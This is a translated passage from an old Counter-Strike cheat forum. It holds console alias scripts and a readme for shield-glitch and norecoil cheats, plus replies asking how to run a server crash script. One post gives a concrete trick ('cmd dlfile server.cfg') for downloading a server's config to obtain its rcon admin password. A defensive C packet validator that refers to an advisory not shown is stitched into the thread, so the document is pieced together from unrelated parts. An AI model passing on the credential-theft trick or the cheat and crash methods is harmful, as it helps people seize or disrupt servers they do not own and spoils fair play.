alias -attfive "-ssens; wa; -speed; wa; cl_pitchspeed 0.6; -lookdown; wa; -attack"

alias +shieldbug2 "buy_shield; wa8; buyequip; ms4; wa; weapon_hegrenade; wa; +attack"
alias -shieldbug2 "drop; wa4; -attack; bind mouse1 +attack"
Readme:
Code:
-------------> INSTALLATION <-------------

Simply copy all files from the shieldscript folder into your cstrike folder (steam\steamapps\euremailadresse\cstrike)!
Now open sensitivity.cfg with Notepad and enter your mouse sensitivity. The file
is structured as follows:

alias -ssens "sensitivity 4.1"

If you have a mouse sensitivity of 3.6, you have to enter it like this:

alias -ssens "sensitivity 3.6"

Now simply save the file and the script is fully set up.

-------------> SHIELDBUG 1 <-------------

The script is controlled entirely through the in-game Commandmenu! We assume
that you start as CT with the USP and enough money for a shield plus another pistol. Now go
into the Commandmenu to "Shieldbug 1" and "Shield kaufen". This buys a shield without
anything else. Now go back into the Commandmenu and select "Shieldbug 1" and "Bug mit..."
to pick the pistol you want to use the bug with. For the bug to work
properly, you must not buy a USP the first time (as CT you already have one) but
must select and buy a different pistol. The bug only works if you buy a different
pistol every round. As an example we choose the "Night Hawk". Now we have bought the shield, the Night Hawk and
enough ammunition, and the bug is activated as well. The pistol menu is still open now; simply
close it again with the 0 key. While you are using the bug, you may ONLY shoot with mouse1
(no switching weapons or selecting grenades! You can reload as normal, though!!!).
So that you do not have to buy a new shield and pistol every round, it is enough to simply
buy a different pistol under "Shieldbug 1" "Bug mit..." at each new round.

This is how I always play:

1. "Shieldbug 1" "Shield kaufen". Now I have a shield.
2. "Shieldbug 1" "Bug mit..." and select the Deagle.
3. Now I have the Deagle, shield and enough ammunition. Close the pistol menu with 0!
4. Next round, buy the USP with "Shieldbug 1" "Bug mit...".
5. After that round, buy the Deagle with "Shieldbug 1" "Bug mit...".
6. Keep alternating like this (Deagle USP, USP Deagle)!

-------------> SHIELDBUG 2 <-------------

You should be standing at the spawn point so that you can buy.
Now simply select "Shieldbug 2" and "Aktivieren". Now hold mouse button 1 down,
you automatically buy a shield and an HE, and then release the button again. You now
automatically throw the shield away and wind up for the HE throw. Now wait until he has thrown the HE
and pick the shield up again. Be a little surprised :D Here too, please do not switch weapons anymore!

P.S. Even though you see nothing, you are still protected by the shield!!!

-------------> NORECOIL (PISTOLS) <-------------

You can optionally enable norecoil for each individual pistol (when used with the shield and SHIELDBUG 1).
Simply go to "Norecoil (Pistols)" and then select the pistol. To turn it off, simply go to
"unbind".
Source:
UCR
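The HLTV advisory in the post above describes query packets as \xff\xff\xff\xff, then a command, then a terminating \0, and reports that a packet with no command crashes the server. As an added example (not part of the original post and not vendor code), the framing checks a query dispatcher can apply before it parses anything; the function names, status codes, the 256-byte limit and the "status" command are assumptions.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

enum oob_status { OOB_OK, OOB_TOO_SHORT, OOB_BAD_HEADER,
                  OOB_UNTERMINATED, OOB_EMPTY_COMMAND, OOB_TOO_LONG };
#define OOB_HDR 4u         /* the \xff\xff\xff\xff prefix */
#define OOB_MAX_CMD 256u   /* assumed upper bound, not from the advisory */

/* Constructed sample datagrams; "status" is an assumed command name. */
static const unsigned char PKT_QUERY[]   = "\xff\xff\xff\xff" "status";
static const unsigned char PKT_EMPTY[]   = { 0xff, 0xff, 0xff, 0xff, 0x00 };
static const unsigned char PKT_NO_NUL[]  = { 0xff, 0xff, 0xff, 0xff, 'i', 'n' };
static const unsigned char PKT_BAD_HDR[] = { 0xff, 0xff, 0xfe, 0xff, 'x', 0x00 };

/* Validate before dispatch; on OOB_OK *cmd is the NUL-terminated command. */
enum oob_status oob_validate(const unsigned char *buf, size_t len,
                             const char **cmd, size_t *cmd_len)
{
    static const unsigned char hdr[OOB_HDR] = { 0xff, 0xff, 0xff, 0xff };
    const unsigned char *body, *nul;
    *cmd = NULL;
    *cmd_len = 0;
    if (buf == NULL || len < OOB_HDR + 1u) return OOB_TOO_SHORT;
    if (memcmp(buf, hdr, OOB_HDR) != 0) return OOB_BAD_HEADER;
    body = buf + OOB_HDR;
    nul = memchr(body, 0, len - OOB_HDR); /* terminator must lie inside the datagram */
    if (nul == NULL) return OOB_UNTERMINATED;
    if (nul == body) return OOB_EMPTY_COMMAND; /* the \xff\xff\xff\xff\0 packet */
    if ((size_t)(nul - body) > OOB_MAX_CMD) return OOB_TOO_LONG;
    *cmd = (const char *)body;
    *cmd_len = (size_t)(nul - body);
    return OOB_OK;
}

/* Convenience wrapper that returns only the verdict. */
enum oob_status oob_check(const unsigned char *buf, size_t len)
{
    const char *cmd;
    size_t n;
    return oob_validate(buf, len, &cmd, &n);
}

int main(void)
{
    printf("query=%d empty=%d ", (int)oob_check(PKT_QUERY, sizeof PKT_QUERY),
           (int)oob_check(PKT_EMPTY, sizeof PKT_EMPTY));
    printf("no_nul=%d bad_hdr=%d\n", (int)oob_check(PKT_NO_NUL, sizeof PKT_NO_NUL),
           (int)oob_check(PKT_BAD_HDR, sizeof PKT_BAD_HDR));
    return 0;
}
```

Rejected datagrams are dropped and counted per source address rather than passed on, so the empty-command packet never reaches the command lookup.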
 

04.02.2004, 20:03 - Post 2
nRw | Cr3w ` S4v4s
Guest

Awesome, no other words needed!


Gr33tz S4vi
 

04.02.2004, 20:05 - Post 3
New user
Registered: 17.07.2003

Wow! Not bad at all!
edewulf is offline

04.02.2004, 22:10 - Post 4
New user
Registered: 06.05.2003

Looks good.

How exactly do the bugs work?

What are they for?
TurkishFighter is offline

05.02.2004, 14:01 - Post 5
diZzY
Guest

Um, sorry, but all the headshot scripts that seem to be going around at the moment are total crap, aren't they? This one too, although this one actually hardly looks upward anymore or anything... but you can't aim properly while shooting anymore, because everything shakes completely... or does any of you see an advantage in it?
 

05.02.2004, 15:21 - Post 6
New user
Registered: 19.10.2003

Let's test whether it works :P
Picker is offline

05.02.2004, 15:47 - Post 7
diZzY
Guest

Quote:
Originally posted by Picker
Let's test whether it works :P
spam?
 

07.02.2004, 14:23 - Post 8
|)4v3
Guest

A question about the server crash script.

So I put these long lines, i.e. the aliases, into my autoexec
and the bind into the config... Does that work too?

Somehow it doesn't work.


Oh, and I was just on a server and pressed p, but nothing happened.
 

07.02.2004, 14:54 - Post 9
New user
Registered: 18.06.2003

1. Crashing servers is stupid.... (imagine it were your server!)
2. Most servers have an anti-floating thing built in that prevents the crashing!
3. The server provider sees the logs and sees your IP )

Regards, subay
subay is offline

07.02.2004, 15:14 - Post 10
New user
Registered: 01.05.2003

You lot, always with that sh*t "imagine it were your server". You cheaters, imagine it were your game that gets hacked and ruins the fun for the fair players, who after all also paid for the game!! So don't talk such BS, because everything available for download here destroys fairness in some way, and that is what the board is there for, after all :evil: Same with the rcon crap... Cheating and exploiting bugs in CS etc. is apparently fine for everyone, but how to get the rcon PW through a bug, that once again gets the "imagine it were your server" treatment :baby: Rcon INFO: Delete the Server.cfg in the cstrike folder (or rename it), then connect to any server and type "cmd dlfile server.cfg" into the console... Poof, the bug creates a new server.cfg for you in the cstrike folder... It doesn't work on all servers, but the majority of server hosts haven't fixed this bug yet. So, all secrets spilled :tongue:
NAFEST is offline

07.02.2004, 16:19 - Post 11
|)4v3
Guest

Nice explanation

But my question still hasn't been answered.
How can I use the "Crash Script"?

Remember, I need a precise explanation because :359:


:350:
 

07.02.2004, 16:50 - Post 12
SyneX
Guest

I think that only works on 1.5
 

All times are WET +2.